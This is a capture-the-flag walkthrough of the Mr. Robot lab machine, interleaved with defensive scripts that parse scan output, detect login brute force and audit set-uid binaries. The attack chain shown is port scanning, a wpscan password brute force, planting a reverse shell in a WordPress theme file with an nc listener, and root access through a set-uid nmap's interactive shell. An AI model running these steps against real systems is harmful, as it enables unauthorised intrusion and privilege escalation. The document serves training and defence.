Port recognition with nmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --script=http-enum --min-rate 5000 mrobot.vuln -p- -v --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 12:56 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:56
Completed NSE at 12:56, 0.00s elapsed
Initiating ARP Ping Scan at 12:56
Scanning mrobot.vuln (10.0.2.20) [1 port]
Completed ARP Ping Scan at 12:56, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:56
Scanning mrobot.vuln (10.0.2.20) [65535 ports]
Discovered open port 443/tcp on 10.0.2.20
Discovered open port 80/tcp on 10.0.2.20
Completed SYN Stealth Scan at 12:57, 26.35s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.20.
Initiating NSE at 12:57
NSE Timing: About 50.00% done; ETC: 12:58 (0:00:38 remaining)
Completed NSE at 12:57, 40.71s elapsed
Nmap scan report for mrobot.vuln (10.0.2.20)
Host is up (0.00037s latency).
Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /feed/: Wordpress version: 4.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
443/tcp open  https
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /feed/: Wordpress version: 4.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
MAC Address: 08:00:27:FF:10:C8 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 12:57
Completed NSE at 12:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 67.31 seconds
           Raw packets sent: 131089 (5.768MB) | Rcvd: 25 (1.080KB)

nmap reports two open ports: 80 for http and 443 for https. The http-enum script also lists some useful folders, including robots.txt, the WordPress login page and the readme, which together reveal the CMS and its version.
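To turn a scan like this into something reviewable, it helps to parse the http-enum output rather than read it by eye. The script below is an added example, not code from the original walkthrough: it parses the `PORT STATE SERVICE` table and the `|`-prefixed http-enum lines, then groups each port's paths by what they disclose (authentication endpoints, information leaks, and the version hints that http-enum reports as "version X found", which mean "present since X", so the highest value is the best estimate). The embedded sample is a trimmed copy of the scan output above; the category keywords are assumptions chosen for this example.

```python
import re

# Constructed sample: a trimmed copy of the http-enum output from the scan
# above, embedded so the parser runs offline without touching any host.
SAMPLE_NMAP = """\
PORT    STATE SERVICE
80/tcp  open  http
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /feed/: Wordpress version: 4.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /readme.html: Interesting, a readme.
|_  /image/: Potentially interesting folder
443/tcp open  https
| http-enum:
|   /wp-login.php: Wordpress login page.
|_  /feed/: Wordpress version: 4.3.1
MAC Address: 08:00:27:FF:10:C8 (Oracle VirtualBox virtual NIC)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
FINDING_RE = re.compile(r"^\|[_ ]\s+(/\S*):\s+(.*)$")
VERSION_RE = re.compile(r"wordpress version:?\s*(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_http_enum(text):
    """Return {port: {"service": str, "paths": {path: note}}} for open ports."""
    results, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, _, state, service = m.groups()
            current = int(port) if state == "open" else None
            if current is not None:
                results[current] = {"service": service, "paths": {}}
            continue
        m = FINDING_RE.match(line)
        if m and current is not None:
            path, note = m.groups()
            results[current]["paths"][path] = note.strip()
    return results


def triage(results):
    """Group each port's paths by what they give away to an outsider."""
    report = {}
    for port, info in results.items():
        auth_paths, info_leaks, versions = [], [], set()
        for path, note in info["paths"].items():
            low = note.lower()
            if "admin" in low or "login" in low:      # assumed keyword rule
                auth_paths.append(path)
            if "readme" in low or "robots" in low:    # assumed keyword rule
                info_leaks.append(path)
            v = VERSION_RE.search(note)
            if v:
                versions.add(v.group(1))
        # "version X found" means the file has shipped since X, so the highest
        # value seen is the best estimate of the version actually running.
        estimate = (max(versions, key=lambda s: tuple(map(int, s.split("."))))
                    if versions else None)
        report[port] = {"service": info["service"],
                        "auth_paths": sorted(auth_paths),
                        "info_leaks": sorted(info_leaks),
                        "version_estimate": estimate}
    return report


if __name__ == "__main__":
    for port, r in triage(parse_http_enum(SAMPLE_NMAP)).items():
        print(f"{port}/tcp ({r['service']}): WordPress ~{r['version_estimate']}, "
              f"auth endpoints {r['auth_paths']}, info leaks {r['info_leaks']}")
```

Feed it the saved output of a real scan (`nmap -oN` text) and the report tells you which files to remove or restrict (readme.html, the version-bearing feed) and which endpoints need rate limiting or IP restrictions (the login and admin paths).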

┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/fsocity.dic > fsocity.dic

We found the first flag and a wordlist. After trying some usernames manually at http://mrobot.vuln/wp-login we obtain the username elliot.

┌──(root@ghost)-[/home/ghost]
└─# wpscan -U elliot -P fsocity.dic --url http://mrobot.vuln/wp-login
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://mrobot.vuln/wp-login/ [10.0.2.20]
[+] Started: Mon Sep 19 13:12:43 2022
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - elliot / ER28-0652                                                                                                                                                                      
Trying elliot / ircs Time: 00:00:16 <                                                                                                                        > (1355 / 859516)  0.15%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: elliot, Password: ER28-0652

[+] Finished: Mon Sep 19 13:13:05 2022
[+] Requests Done: 1632
[+] Cached Requests: 47
[+] Data Sent: 545.548 KB
[+] Data Received: 5.774 MB
[+] Memory used: 211.41 MB
[+] Elapsed time: 00:00:21
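From the server's side, the run above leaves a very recognisable trail: hundreds of POSTs to wp-login.php from one address in a few seconds, answered with 200 (WordPress re-renders the form on a failed login) until one answer is a 302 redirect (a successful login). The script below is an added example, not part of the walkthrough, showing the detection a defender would run over the access log. The log lines are constructed for this example to resemble Apache combined-format entries from such a run; the 60-second window and threshold of 20 attempts are assumptions to tune for your own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
WINDOW = timedelta(seconds=60)   # sliding window (assumed value)
THRESHOLD = 20                   # login POSTs per window per IP (assumed value)


def build_sample_log():
    """Constructed Apache combined-format lines, not a capture from the box:
    40 failed guesses in 20 s, then one success, plus one ordinary user."""
    base = datetime(2022, 9, 19, 13, 12, 43, tzinfo=timezone(timedelta(hours=-4)))
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "{ua}"'
    ts = lambda t: t.strftime(TS_FMT)
    lines = []
    for i in range(40):
        lines.append(fmt.format(ip="10.0.2.15", ts=ts(base + timedelta(milliseconds=500 * i)),
                                method="POST", path="/wp-login.php", status=200, size=3876,
                                ua="WPScan v3.8.22"))
    lines.append(fmt.format(ip="10.0.2.15", ts=ts(base + timedelta(seconds=21)),
                            method="POST", path="/wp-login.php", status=302, size=0,
                            ua="WPScan v3.8.22"))
    lines.append(fmt.format(ip="10.0.2.7", ts=ts(base), method="POST", path="/wp-login.php",
                            status=302, size=0, ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="10.0.2.7", ts=ts(base), method="GET", path="/index.php",
                            status=200, size=1200, ua="Mozilla/5.0"))
    return lines


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"].split("?")[0],
            "status": int(m["status"])}


def detect_login_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: stats} for sources that POSTed to wp-login.php at least
    `threshold` times inside any `window`-long interval."""
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == "/wp-login.php":
            per_ip[ev["ip"]].append(ev)
    alerts = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e["ts"])
        peak, start = 0, 0
        for end in range(len(events)):           # two-pointer sliding window
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            # A 302 from wp-login.php is a successful login; one inside a
            # burst of 200s means a guessed password and is the urgent case.
            successes = sum(1 for e in events if e["status"] == 302)
            alerts[ip] = {"attempts": len(events), "peak_per_window": peak,
                          "successes": successes}
    return alerts


if __name__ == "__main__":
    for ip, stats in detect_login_bursts(build_sample_log()).items():
        print(f"ALERT {ip}: {stats}")
```

Run it over a real log with `detect_login_bursts(open("/var/log/apache2/access.log"))`. Any alert with `successes > 0` means the account's password must be reset; the rest are candidates for a fail2ban-style block and for putting a rate limit or a second factor in front of wp-login.php.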

After logging in to WordPress as elliot, go to Appearance/Editor, select custom-header.php, place your socket shell there, press Update File, set your listener and curl it at http://mrobot.vuln/wp-admin/theme-editor.php

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from mrobot.vuln [10.0.2.20] 36341
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 17:30:04 up 49 min,  0 users,  load average: 0.00, 0.01, 0.07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
daemon@linux:/$ find / -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

daemon@linux:/$ /usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# find / "of-3.txt" 2>/dev/null | grep "of-3.txt"
/root/key-3-of-3.txt
/opt/bitnami/apps/wordpress/htdocs/key-1-of-3.txt
/home/robot/key-2-of-3.txt
# cat /home/robot/key-2-of-3.txt && cat /root/key-3-of-3.txt
822c73956184f694993bede3eb39f959
04787ddef27c3dee1ee161b21670b4e4
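The privilege escalation hinges on a set-uid nmap sitting in /usr/local/bin, which the `find / -perm -u=s` listing exposes in one line. The audit below is an added example, not part of the walkthrough: it reproduces that enumeration in Python, compares the result against a baseline and flags anything not in the baseline or outside the package-managed directories. The embedded listing is copied from the find output above; the baseline is constructed for this example as that same list minus the nmap entry (in practice you record it from a known-good image of the same build), and the directory prefixes are an assumption to adapt to your distribution.

```python
import os
import stat
import sys

# Copied from the `find / -perm -u=s 2>/dev/null` output above.
SUID_LISTING = """
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""

# Constructed baseline for this example: the listing minus the entry the
# walkthrough abuses. Record yours from a clean image and version-control it.
BASELINE = set(SUID_LISTING.split()) - {"/usr/local/bin/nmap"}

# Where package-managed set-uid helpers normally live (assumed for this example).
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")


def scan_suid(root="/"):
    """Live equivalent of `find / -perm -u=s`: regular files with the set-uid bit."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(("/proc", "/sys", "/dev")):   # skip pseudo filesystems
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid(paths, baseline=BASELINE):
    """Return [(path, [reasons])] for set-uid files that deserve a look."""
    findings = []
    for path in sorted(paths):
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(PACKAGED_PREFIXES):
            reasons.append("outside package-managed directories")
        if reasons:
            findings.append((path, reasons))
    return findings


def remediation(findings):
    """Commands that drop the set-uid bit; review each one before running it."""
    return [f"chmod u-s {path}" for path, _ in findings]


if __name__ == "__main__":
    # Pass --live to walk the local filesystem instead of the embedded listing.
    listing = scan_suid() if "--live" in sys.argv else SUID_LISTING.split()
    findings = audit_suid(listing)
    for path, reasons in findings:
        print(f"{path}: {', '.join(reasons)}")
    for cmd in remediation(findings):
        print("  fix:", cmd)
```

On this box the audit reports only /usr/local/bin/nmap, for both reasons, and the fix is `chmod u-s /usr/local/bin/nmap` (or removing the hand-installed copy altogether). Running the audit periodically and diffing against the baseline catches the same class of mistake before a foothold account like daemon finds it.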